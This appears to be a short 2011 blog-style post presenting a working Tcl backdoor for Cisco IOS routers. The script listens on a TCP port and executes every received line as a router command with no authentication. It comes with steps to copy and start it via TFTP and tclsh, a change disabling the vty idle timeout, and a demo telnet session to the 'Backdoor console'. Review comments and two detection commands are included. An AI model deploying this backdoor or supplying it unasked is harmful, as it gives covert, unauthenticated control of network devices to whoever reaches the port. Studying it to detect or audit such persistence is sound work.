April 1, 2011

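Cisco backdoor

A Tcl script run from the IOS Tcl shell that listens on a TCP port and executes each line it receives as a router command, with no authentication and no encryption. Loading and starting it already requires privileged EXEC access (the Router# prompt below), so this is a persistence technique on a router that is already controlled, not a vulnerability in IOS.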

Router# copy tftp://TFTP_SERVER_ADDRESS/script.tcl flash://script.tcl 
Router# tclsh flash://script.tcl

# Accept handler for the listening socket: Tcl's "socket -server" calls this
# once per incoming connection with the new channel, the client address and
# the client port.
# NOTE(review): nothing here checks who is connecting. addr and port are
# never used, there is no password prompt, and the channel is a plain TCP
# socket, so anyone who can reach the port gets the prompt in cleartext.
proc callback {sock addr port} {
# CRLF line endings and line buffering, which suits a telnet-style client.
fconfigure $sock -translation crlf -buffering line
# Banner followed by a prompt that imitates the IOS privileged EXEC prompt.
puts $sock "Backdoor console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
# From now on every readable event on this channel is handled by echo.
fileevent $sock readable [list echo $sock]
}
# Readable-event handler: reads one line from the client, runs it, and writes
# the result back followed by a fresh prompt.
# NOTE(review): the received line goes to exec unfiltered. In the IOS Tcl
# shell exec runs an EXEC-mode command, presumably with the privilege of the
# session that started tclsh - confirm on the platform in question.
proc echo {sock} {
# var is the variable the main script waits on; this proc never assigns it.
global var
flush $sock
# Read failure or end of file: the client is gone, so close the channel.
if {[catch {gets $sock line}] ||
[eof $sock]} {
return [close $sock]
}
# Run the line; catch stores either the command output or the error text
# in result, so a failing command does not abort the handler.
catch {exec $line} result
# If the reply cannot be written the connection is dead; close it.
if {[catch {puts $sock $result}]} {
return [close $sock]
}
puts -nonewline $sock "Router# "
flush $sock
}

# NUMBER_OF_PORT is a placeholder for the TCP port to listen on.
set port NUMBER_OF_PORT
# Open the listening socket; each new connection is passed to callback.
set sh [socket -server callback $port]
# Enter the event loop until var is written. Nothing in this listing writes
# var, so the listener stays up for as long as this tclsh session lives and,
# as far as the listing shows, the close below is not reached.
vwait var
close $sh

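Disable the idle timeout on vty lines 0-4 (exec-timeout 0 0), presumably so that the session left running the script is not disconnected for inactivity. On a production router this setting is itself a finding in a configuration audit:

Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0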

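Checks that reveal the running script: the first filters the process list for Tcl, the second lists the ports the router itself is listening on, where the script's port should appear. An unexpected entry in either output is worth investigating:

Router#show processes cpu | i Tcl
Router#show control-plane host open-ports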

telnet router NUMBER_OF_PORT
Trying 10.0.0.1 ...
Connected to router.
Escape character is '^]'.

Backdoor console:

Router#
